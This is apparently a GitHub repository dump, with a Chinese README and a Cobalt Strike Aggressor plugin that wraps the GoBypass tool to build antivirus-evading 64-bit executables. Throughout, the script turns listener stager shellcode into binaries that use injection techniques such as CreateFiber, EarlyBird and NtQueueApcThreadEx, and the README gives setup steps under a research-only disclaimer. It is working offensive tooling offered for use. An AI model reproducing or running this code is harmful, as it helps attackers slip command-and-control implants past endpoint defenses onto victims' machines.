├── README.md └── bypass-script.cna /README.md: -------------------------------------------------------------------------------- 1 | # Bypass-script 2 | 3 | ### 免责声明 4 | 5 | 该工具仅用于安全研究,禁止使用工具发起非法攻击等违法行为,造成的后果使用者负责 6 | 7 | ### 介绍 8 | 9 | `Cobaltstrike`免杀插件 10 | 11 | 调用https://github.com/Sec-Fork/GoBypass免杀生成工具 12 | 13 | ### 准备工作 14 | 15 | 下载`GoBypass`免杀工具到cs客户端的启动目录。 16 | 17 | 下载地址:https://github.com/sssqp/GoBypass(因为原版不支持mac和Linux下生成exe, 18 | 19 | 所以建议下载我fork后的修改版本) 20 | 21 | ###### 注意事项: 22 | 23 | 1. 确保安装`Golang`且环境变量中包含`go`否则无法编译 24 | 2. 请在`GoBypass`目录先执行`go env -w GO111MODULE=on`然后`go mod download`命令下载依赖 25 | 3. 如果下载依赖过慢配置镜像`go env -w GOPROXY=https://mirrors.aliyun.com/goproxy` 26 | 27 | ### 示例 28 | 29 | ![image-20220504103235568](https://sssq0p-1253744829.cos.ap-nanjing.myqcloud.com/img/image-20220504103235568.png) 30 | 31 | ![image-20220504103413204](https://sssq0p-1253744829.cos.ap-nanjing.myqcloud.com/img/image-20220504103413204.png) 32 | -------------------------------------------------------------------------------- /bypass-script.cna: -------------------------------------------------------------------------------- 1 | popup bypassAV{ 2 | item("&bypassAV",{Generator()}); 3 | separator(); 4 | item("&help",{url_open("https://github.com/sssqp/bypass-script")}); 5 | 6 | } 7 | 8 | 9 | sub Generator{ 10 | $dialog = dialog("Generator", %(listener => "" ,bit => false , bypassfunc => "" ), &GeneratorFunc); 11 | drow_listener($dialog, "listener", "Listener: "); 12 | drow_combobox($dialog, "bypassfunc", "bypass Func:", @("CreateFiber", "CreateProcess", "CreateThread" , "CreateThreadNative", "CryptProtectMemory" , "CryptUnprotectMemory" ,"EarlyBird" , "EtwpCreateEtwThread" , "NtQueueApcThreadEx" , "UuidFromStringA")); 13 | dialog_description($dialog, "该插件用于快速生成免杀的可执行文件,目前仅支持生成64位exe"); 14 | dbutton_action($dialog, "Generate"); 15 | dbutton_help($dialog, ""); 16 | #drow_checkbox($dialog, "bit", "x64: ", "使用64位的payload"); #对32位shellcode存在问题,先删除 17 | dialog_show($dialog); 18 | } 19 | 20 | sub GeneratorFunc{ 21 | #对32支持有问题,先删除 22 | #获取32位/64位shellcode 23 | #$a = $3["bit"] . ""; 24 | #if ($3["bit"] eq "false"){ 25 | # $system = "x86"; 26 | # #$arch = "386"; 27 | #}else{ 28 | # $system = "x64"; 29 | # #$arch = "amd64"; 30 | #} 31 | 32 | #获取免杀类型 33 | $bypassfunc = $3["bypassfunc"] . ""; 34 | #生成shellcode 35 | $shell_code = stager($3["listener"], "x64"); 36 | #将shellcode转换成\xaa... 37 | $arr = transform($shell_code, "veil"); 38 | $arr = "\"" . $arr . "\""; 39 | println($arr); 40 | #获取当前目录 41 | #判断是否存在GoBypass,不存在直接退出 42 | if(-exists "GoBypass"){ 43 | #写shellcode 44 | $handle_a = openf(">GoBypass/shellcode.txt"); 45 | println($handle_a, $arr); 46 | closef($handle_a); 47 | 48 | #保存文件 49 | prompt_file_save("temp.exe",{ 50 | 51 | #判断当前系统 52 | if ("*Windows*" iswm systemProperties()["os.name"]){ 53 | $process1 = exec("cmd /c cd GoBypass && go run main.go -m $bypassfunc -d"); 54 | @data1 = readAll($process1); 55 | println(@data1); 56 | closef($process1); 57 | 58 | 59 | }else{ 60 | $process1 = exec(@("bash", "-c","cd GoBypass && go run main.go -m $bypassfunc -d")); 61 | @data1 = readAll($process1); 62 | println(@data1); 63 | closef($process1); 64 | 65 | } 66 | #保存exe 67 | $handle = openf("GoBypass/output.exe"); 68 | $handle1 = openf("> $+ $1"); 69 | $data = readb($handle, -1); 70 | writeb($handle1 , $data); 71 | closef($handle); 72 | closef($handle1); 73 | show_message("save to $+ $1"); 74 | }); 75 | }else{ 76 | show_message("GoBypass file not exist, See the help documentation"); 77 | } 78 | 79 | } 80 | menubar("bypassAV", "bypassAV"); # 菜单函数 --------------------------------------------------------------------------------